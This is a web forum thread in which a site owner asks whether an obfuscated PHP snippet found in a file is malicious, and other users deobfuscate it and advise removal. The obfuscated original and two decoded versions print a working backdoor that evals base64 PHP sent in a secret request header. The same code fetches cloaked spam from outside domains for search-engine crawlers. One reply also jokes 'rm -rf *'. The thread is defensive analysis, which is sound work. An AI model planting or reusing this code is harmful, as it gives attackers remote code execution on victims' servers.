Hi I need help today i have seen a strange code in my php file while making changes. Site working fine but i'm worried that this may be virus or not? Help with this. <?php /*versio:2.17*/$IllI=0;if (!function_exists('I111I1ll')){$GLOBALS['IllI'] = '=Y3VybAX2luaXQYWxsb3dfdXJsX2ZvcGVuX$O%DMQ{S?mPDaHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cw}DX3NldG9wdAGediX2V4ZWMJndheT1jdXJsoYYSLwjb3Nvbi5pbg!EYS1pbi1hLWNpcmNsZS5jb20XJkcGhwYWlkZS5jb20dwWWWV8@}OgLZGlzcGxheV9lcnJvcnMSZGV0ZXJtaW5hdG9yUp^ZnRwMTMAMi4xNw~ebUVFPMDBRT08LYmFzZTY0X2RlY29kZQ}RAYmFzZTY0X2VuY29kZQwSFRUUF9IT1NU{dW5pb24c2VsZWN0MvnUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUVUVVFUllfU1RSSU5HsPHwj_PwoKVE1QG BVEVNUARVE1QRElSWRdG1wE)ld3AtY29udGVudC91cGxvYWRzLL.d3AtY29udGVudC9jYWNoZQdXBsb2FkX3RtcF9kaXIxL3RtcA(LgRodmVyc2lv_?kLQthLXBocAlbVSFRUUF9FWEVDUEhQb3V0b2swOSFRUUF9VU0VSX0FHRU5UGIwQLAZ29vZ2xlLHlhaG9vLGJpbmcsbXNuLGFzayxiYWlkdSxjcmF3bGVyLHlhbmRleA~d;L3BnLnBocD91PQbJms9JnQ9cGhwJnA9Z$JnY9HEZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYzMXZva2dZL3lwVDB6U1FzQnlENE10NlhEUzdka3ZTMDJydEpwdXVJUzRPTFZrRWczamRwdkc3My9QTUREQlcycjNUUDhSNTN0OSs4eEJIUkR0YnN5aE8yVnByclZuQjhrMmNyb29zYituNkM0bjJhVmpFV1VwVVNoQ3hMTkxPWjlac2FzME1jbkUrbStLSGVHUnlkMzJ0a3hkU24yemlNTStLZU1PMEl0OHpmVUJ5VnV6emxLZ3E0UFJRVzNwZ1JSUW5URHYzZlpva3ZnSEtac0JuZ1RmblBoejRDYWoxS2FWSTFxaEJPaUFQekhnRUZNbGpWaHhkZzNTQll4aW5jYkJqaFZhTE9nYXhMZDBnRk1neDVJR3pQRFN3Nk1SVFRMYjdjS2p6TVAyRUpqNzFodWd3U2daaGxoWXNMWGExQ2dmc1Uwc25KcEVCNFpPSXlLeDF1c0RWQmtOVmZxUnF6QXhMZGd6ZEt6TVVzRi94RGt6SW1MRk1vTkN5cGpNSWZ5aFBOWkVVK2taU2VuM3UxUUFyWlVFUm1uaW8xWmFwazRvMGFjWWduKzdtMTlPYlJRQS9Cdm1mb1ZKcUFadXR2NnY0YWp6NlBKNGIwUXBpZjVkeFBsN2N6U2VMK1doeWV3a0Nzc25lNXY4MG5VekdueFlMLysveDlHNWhFSmZuQ1gzemVmWkVPa281VkJYdTh5UUlrMnpIbEZPc0I5dHNpMmROQ2tNVmFqVjFyTFpyRUVqem9TNHI1eW5MeWtlRnp3QWFqM1paK0RQYnNyVHUvWjVsQ0k0WlB1QmhrZ2luMFlOeWZzVEV3WjlaazNGeVBKOFFVclRkWS8rVUE5ejZNbDZRRjFtcHc4WFQ2dGxEVDFoQnJoYUxteitvYVgzUHY2ZFgyYTc0Q0d6Q3RRTWV0Ymp5bVNYOHY3bTZDYWEzU3YvWUhSd1VFOCsvanVlMy9uVFNZUHR1eC9JUG93Y1ltby9jQjFUR2xaY0duaDRSRGM3ZUFTQVpuMDR1TG9qMkNuREloNXI4SjNoVFo4ckVqTVBNS3M1UXU4ZXhhQmlWOVM3eENaNm1Ja3IyYTV0a2E2YTFLaCtOVWlYdzdWT0VHTWw5YnkzcmdZNDNUWEtjajl2RUwzWWZkQmhZR2VYNTZsbkJJVnZNcXpKczFBSG9zOXRIUngwY1FCY25xMExUcHp3dUdHL1NoUG9HL09JVFpFRzJ6eFNLRHZBbG0wNHcxZnA2TmtjNllCOUdVcEVRcVJRTjFGd2hSY1pTMmMvMkJSUmNRM0FCZEJHMWdoQkJKUXNmTThYM0hqUkxXemNsbzlKRmZjcTdTQXFhUEg4dFhxVlRSTzhEWHRPK0x0cGUzR28xMVVZMHB4MEorS0tQRTY4bXR5WGNnUXNJaFFyRnFXNFp6SkFxNHlLV1VkRWdVTXVaUXVwQThtaFA2SU9SVjZWNjdZckVoOGw3RGFFVnhmUjJSVjVrU2ZiRWNtMTRIdHlPNXpCSzkvVmRaTmtjVExIUm9peG5xL0FSNmhyZ1FLOTJSQ2JUKzZ2T090WWRWRzR6Ykh0K1dOZTdUVjNNQUVJWmFyaVg0a3V2QWMvS1MrbE5YVFk0MXZ0dnVnN2dsWFlXNy9qb25JYUlkWUd1WG9vcjkyMDZ4KzlUc3RNWFpJVE14aFIyWE40V3k5K3BOOVVkb05mRnJvUUw3ajJOWWhiRXFDR1VUTDJ5ckUxU1Zad0NvK0RyRFRkcnQ3d01UTm1YcHNSWjJZeGxnMEVycitNOFhRSHdCY0dsZnowT0F0Mzg3TS9oc3B2T3Y0RzFtOUY4QkkrOHRhQVd0RUtaeGhCdzZoeDlhVFFUZXpnUGdqaWVmSDFEN0lqaVdDNzJRNk5NcVUzR1VjKytndzNwNkUwVWJDKzdtWVFGdDIwZ25lNXpUcGR5Z0ZCUjArbno2VGJJMFFqSkhQRWhncnhUWDg3T1dYbnJpME8rbFBKSDAydE10dGdyZHdIQzUrcUhXR3RyU2U0NjM3MzQ0WUQ4QVBzL3ErdWcyR3k5MC9nd1h3SVE4U3ROVkZWcTRaMGRmQXRHZDR1cjF0THpKRnNKdUNWOERpVXcxeHVveFFmV0tPR3ZOdWpTdGpBb0VGTWxkREZ6MVRLQ3Qrek1rMGpZTkdvdWJnUjgxUEJLWWYrc2tsSUtkUHpHUGNjV3JhQ2M4QnVEWHppd0VSZWF4Ui9MaEl0M0NNZ2d0MVZrKy9CUi9PV3ZBbUd5WDdNZ1MwTldIZ3BJRTZzMFR1b1ExajZXaG5obHl5TXhhZmhCcEhrZmwxMlg4amVISTF3dVZ3ZGw2M2N4czJwUVhVd3B2bDJJemxOdTZ4SnBoUXRHUlQzenZFdStKZ3MyTlZUeFpvQmJuYm9YZGpDVjFNRU80bkhWQmUzZ2E0aFR0WlpDNkZCK3paejJRS2ZyQ2hIUk5RTzVwT0lXWEwzSWlhMEd0cUg2WFc3d3FpU0g0ODZINzc4N2xmTmEiKSkpOwcHJlZ19yZXBsYWNl';function I111I1ll($a, $b){$c=$GLOBALS['IllI']; $d=pack('H*','6261736'.'536345f6465636f6465'); return $d(substr($c, $a, $b));};$IIII1l1I1 = I111I1ll(3239, 16);$IIII1l1I1("/IllI1lI11/e", I111I1ll(681, 2558), "IllI1lI11");};?> PHP: Thanks
Very Interesting find, I'm this far into decoding it: <?php if(!defined("determinator")){ function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){ $QOOOOO = microtime(true); return feof($Q0QO0Q); } function getfile($II1llI, $QQQ0Q0){ $IllIIl = I111I1ll(1, 6); $III111 = $IllIIl.I111I1ll(7, 7); @ini_set(I111I1ll(14, 20), 1); if (@ini_get(I111I1ll(14, 20)) == I111I1ll(39, 2)){ $Il1lI1=@file_get_contents(I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(57, 30)); return $Il1lI1; } elseif (function_exists($III111)){ $QQ00OQ = @$III111(); $II1111 = $IllIIl.I111I1ll(89, 10); $QO00QO = $IllIIl.I111I1ll(103, 7); @$II1111($QQ00OQ, CURLOPT_URL, I111I1ll(47, 10) . $II1llI . $QQQ0Q0. I111I1ll(110, 12)); @$II1111($QQ00OQ, CURLOPT_HEADER,false); @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true); @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5); $I111II = @$QO00QO($QQ00OQ); @curl_close($QQ00OQ); if (empty($I111II)){ $I111II = I111I1ll(125, 0); } return $I111II; } else { $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5); if ($Q0QO0Q){ $QOQ0QQ = I111I1ll(125, 0); $QOOOOO = NULL; @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n"); $QQ0O0Q = PHP_OS.I111I1ll(126, 2).PHP_VERSION; @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n"); while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){ $QOQ0QQ .= @fgets($Q0QO0Q, 128); } @fclose($Q0QO0Q); $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ); unset($Q0OO0Q[0]); return implode("\r\n\r\n", $Q0OO0Q); } } } $QO0Q00 = Array(I111I1ll(129, 10), I111I1ll(141, 23), I111I1ll(167, 15)); function write($I11l1I,$I1I11l){ if ($Q0OQQQ=@fopen($I11l1I,I111I1ll(182, 2))){ @fwrite($Q0OQQQ,$I1I11l); @fclose($Q0OQQQ); } } function output($IlllII, $QOOQ00){ echo I111I1ll(186, 3).$IlllII.I111I1ll(191, 2).$QOOQ00."\r\n"; } @ini_set(I111I1ll(194, 19), 0); define(I111I1ll(214, 16), 1); $II1lll=I111I1ll(233, 7); $IlIllI=I111I1ll(241, 6); $I11l1l=I111I1ll(250, 11); $Q00OOQ=I111I1ll(262, 18); $Il1IIl=I111I1ll(283, 18); $II1llI=I111I1ll(47, 10); $II1llI.=strtolower(@$_SERVER[I111I1ll(302, 12)]); foreach ($_GET as $IlllII=>$QOOQ00){ if (strpos($QOOQ00,I111I1ll(315, 7))){ $_GET[$IlllII]=I111I1ll(125, 0); } elseif (strpos($QOOQ00,I111I1ll(322, 8))){ $_GET[$IlllII]=I111I1ll(125, 0); } } if(!isset($_SERVER[I111I1ll(333, 15)])) { $_SERVER[I111I1ll(333, 15)] = @$_SERVER[I111I1ll(349, 15)]; if(@$_SERVER[I111I1ll(365, 16)]) { $_SERVER[I111I1ll(333, 15)] .= I111I1ll(387, 2) . @$_SERVER[I111I1ll(365, 16)]; } } if ($QQ0QOO=$II1llI.@$_SERVER[I111I1ll(333, 15)]){ $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l); $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR; $IIlll1 = Array( @$_SERVER[I111I1ll(391, 4)], @$_SERVER[I111I1ll(398, 6)], @$_ENV[I111I1ll(391, 4)], @$_ENV[I111I1ll(405, 8)], @$_ENV[I111I1ll(398, 6)], $Il1Ill.I111I1ll(415, 4), $Il1Ill.I111I1ll(422, 24), $Il1Ill.I111I1ll(449, 22), @ini_get(I111I1ll(471, 19)), I111I1ll(491, 6), ); foreach ($IIlll1 as $IIlI1I){ if (!empty($IIlI1I)){ $IIlI1I.=DIRECTORY_SEPARATOR; if (@is_writable($IIlI1I)){ $Il1Ill = $IIlI1I; break; } } } $tmp=$Il1Ill.I111I1ll(498, 2).$QOQOQO; if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){ echo "\r\n"; @output(I111I1ll(502, 8), $IlIllI.I111I1ll(513, 2).$II1lll.I111I1ll(517, 6)); if ($QOOOOQ=$Q00OOQ(@$_SERVER[I111I1ll(526, 16)])){ @eval($QOOOOQ); echo "\r\n"; @output(I111I1ll(542, 4), I111I1ll(546, 3)); } exit(0); } if (@is_file($tmp)){ @touch($tmp); @include_once($tmp); } else{ $QQ0QOO=@urlencode($QQ0QOO); $Illlll = @strtolower(@$_SERVER[I111I1ll(551, 20)]); foreach (explode(I111I1ll(575, 2), I111I1ll(577, 62)) as $III11l){ if (strpos($Illlll, $III11l)!==False){ if (@touch($tmp)){ $QQQ0Q0 = I111I1ll(642, 14).$QQ0QOO.I111I1ll(657, 4).$QOQOQO.I111I1ll(661, 12).$II1lll.I111I1ll(675, 4).$IlIllI; $I1lllI = getfile($QO0Q00[0], $QQQ0Q0); @touch($tmp); } break; } } } } } ?> PHP:
Which translates to: <?php if(!defined("determinator")){ function determinator_feof($Q0QO0Q, &$QOOOOO = NULL){ $QOOOOO = microtime(true); return feof($Q0QO0Q); } function getfile($II1llI, $QQQ0Q0){ $IllIIl = curl_init; @ini_set("allow_url_fopen", 1); if (@ini_get("allow_url_fopen") == 1){ $Il1lI1=@file_get_contents("http://" . $II1llI . $QQQ0Q0. "&way=file_get_contents"); return $Il1lI1; } elseif (function_exists($III111)){ $QQ00OQ = @$III111(); $II1111 = $IllIIl."_setopt"; $QO00QO = $IllIIl."_exec"; @$II1111($QQ00OQ, CURLOPT_URL, "http://" . $II1llI . $QQQ0Q0. "&way=curl"); @$II1111($QQ00OQ, CURLOPT_HEADER,false); @$II1111($QQ00OQ, CURLOPT_RETURNTRANSFER,true); @$II1111($QQ00OQ, CURLOPT_CONNECTTIMEOUT, 5); $I111II = @$QO00QO($QQ00OQ); @curl_close($QQ00OQ); if (empty($I111II)){ $I111II = ""; } return $I111II; } else { $Q0QO0Q = @fsockopen($II1llI, 80, $Q0QOQ0, $I1llll, 5); if ($Q0QO0Q){ $QOQ0QQ = ""; $QOOOOO = NULL; @fputs($Q0QO0Q, "GET {$QQQ0Q0}&way=socket HTTP/1.0\r\nHost: {$II1llI}\r\n"); $QQ0O0Q = PHP_OS."/".PHP_VERSION; @fputs($Q0QO0Q, "User-Agent: {$QQ0O0Q}\r\n\r\n"); while(!determinator_feof($Q0QO0Q, $QOOOOO) && (microtime(true) - $QOOOOO) < 2){ $QOQ0QQ .= @fgets($Q0QO0Q, 128); } @fclose($Q0QO0Q); $Q0OO0Q = explode("\r\n\r\n", $QOQ0QQ); unset($Q0OO0Q[0]); return implode("\r\n\r\n", $Q0OO0Q); } } } $QO0Q00 = Array("oson.in", "a-in-a-circle.com", "phpaide.com"); function write($I11l1I,$I1I11l){ if ($Q0OQQQ=@fopen($I11l1I,"w")){ @fwrite($Q0OQQQ,$I1I11l); @fclose($Q0OQQQ); } } function output($IlllII, $QOOQ00){ echo "Y_".$IlllII.":".$QOOQ00."\r\n"; } @ini_set("display_errors", 0); define("determinator", 1); $II1lll="ftp13"; $IlIllI="2.17"; $I11l1l="QQO00QOO"; $Q00OOQ="base64_decode"; $Il1IIl="base64_encode"; $II1llI="http://"; $II1llI.=strtolower(@$_SERVER["HTTP_HOST"]); foreach ($_GET as $IlllII=>$QOOQ00){ if (strpos($QOOQ00,"union")){ $_GET[$IlllII]=""; } elseif (strpos($QOOQ00,"select")){ $_GET[$IlllII]=""; } } if(!isset($_SERVER["REQUEST_URI"])) { $_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"]; if(@$_SERVER["QUERY_STRING"]) { $_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"]; } } if ($QQ0QOO=$II1llI.@$_SERVER["REQUEST_URI"]){ $QOQOQO=@md5($II1llI.$IlIllI.PHP_OS.$I11l1l); $Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR; $IIlll1 = Array( @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], $Il1Ill."tmp", $Il1Ill."wp-content/uploads", $Il1Ill."wp-content/cache", @ini_get("upload_tmp_dir"), "/tmp", ); foreach ($IIlll1 as $IIlI1I){ if (!empty($IIlI1I)){ $IIlI1I.=DIRECTORY_SEPARATOR; if (@is_writable($IIlI1I)){ $Il1Ill = $IIlI1I; break; } } } $tmp=$Il1Ill.".".$QOQOQO; if (@$_SERVER["HTTP_Y_AUTH"]==$QOQOQO){ echo "\r\n"; @output("versio", $IlIllI."-".$II1lll."-php"); if ($QOOOOQ=$Q00OOQ(@$_SERVER["HTTP_EXECPHP"])){ @eval($QOOOOQ); echo "\r\n"; @output("out", "ok"); } exit(0); } if (@is_file($tmp)){ @touch($tmp); @include_once($tmp); } else{ $QQ0QOO=@urlencode($QQ0QOO); $Illlll = @strtolower(@$_SERVER["HTTP_USER_AGENT"]); foreach (explode(",", "google,yahoo,bing,msn,ask,baidu,crawler,yandex") as $III11l){ if (strpos($Illlll, $III11l)!==False){ if (@touch($tmp)){ $QQQ0Q0 = "/pg.php?u=".$QQ0QOO."&k=".$QOQOQO."&t=php&p=".$II1lll."&v=".$IlIllI; $I1lllI = getfile($QO0Q00[0], $QQQ0Q0); @touch($tmp); } break; } } } } } ?> PHP: I am still trying to figure out what it does, it looks malicious, I'd remove it.
Is this in the WordPress code? yes its malicious code. Please remove it ASAP Search for "defined("determinator")" in google and you would get more details about it
That said, it must be old as "oson.in" is no longer an owned domain, so it was malicious code, but still remove it
Rule of thumb! -- If a code is not readable to a coder.... or look malicious... * rm -rf * remove the code! It's better to be safe than sorry
Its usually code added automatically to some pages, happened to me in the past as well. Will lead to google marking your website as spam and when someone clicks your link google will warn them there might be viruses on your website. It seems to be using sockets so its definetily calling some other page and maybe downloading or sending confidential data to them..